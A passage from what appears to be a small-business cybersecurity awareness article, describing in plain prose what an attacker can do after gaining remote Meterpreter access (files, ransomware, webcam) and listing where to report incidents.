Attack Systems: Attack a system with live exploits to gain access by delivering a payload that lets the hacker control it. The demonstration covers the AFTER of the attack so as not to spread live attack methods and techniques.

Once the attack has occurred and the backdoor into the system is open, the hacker has complete Meterpreter shell access as well as his complete hacking toolkit. This screenshot shows the exploit running as a background process on the target computer, having opened a session back to the hacking system on

Here the attacker is connected and in the root of the C: drive. Changing directories to Users\Mama\My Documents would grant access to the same small business owner files shown above in the physical access attack, except this time the hacker is sitting in his car across the street, with no fear of getting caught.

With this kind of remote access, the attacker can launch any number of further attacks on the small business owner. He could inject other malware to infect the business's customers or partners, or hijack the system with ransomware, encrypting the hard drive and locking the owner out.

The screenshot below offers a scary option to a cybercriminal: the webcam commands. What kind of compromising material could be captured by snapping pictures or starting a video stream from the web camera?

If a business suspects that it has been the victim of a cyberattack:

• Inform local law enforcement or the state attorney general.

• Report stolen finances/identities and other cybercrimes to the Internet Crime Complaint Center:

• Report fraud, identity theft, scams or rip-offs to the Federal Trade Commission:

• Report computer or network vulnerabilities to US-CERT via the hotline 1-888-282-0870 or the US-CERT website:

Recommended Reading

New NIST Guide Helps Small Businesses Improve Cybersecurity

Federal Communications Commission – Cybersecurity for Small Business

NIST - Small Business Information Security: The Fundamentals

U.S. Small Business Administration – Cybersecurity Resources for Small Business Owners.

Department of Homeland Security: Stop. Think. Connect. Small Business Resources

US Computer Emergency Readiness Team: Resources for Small Businesses

National Cyber Security Alliance

'Ransomware' scam leaves victims powerless

Images of Samsung Galaxy S7 hacked with Ransomware
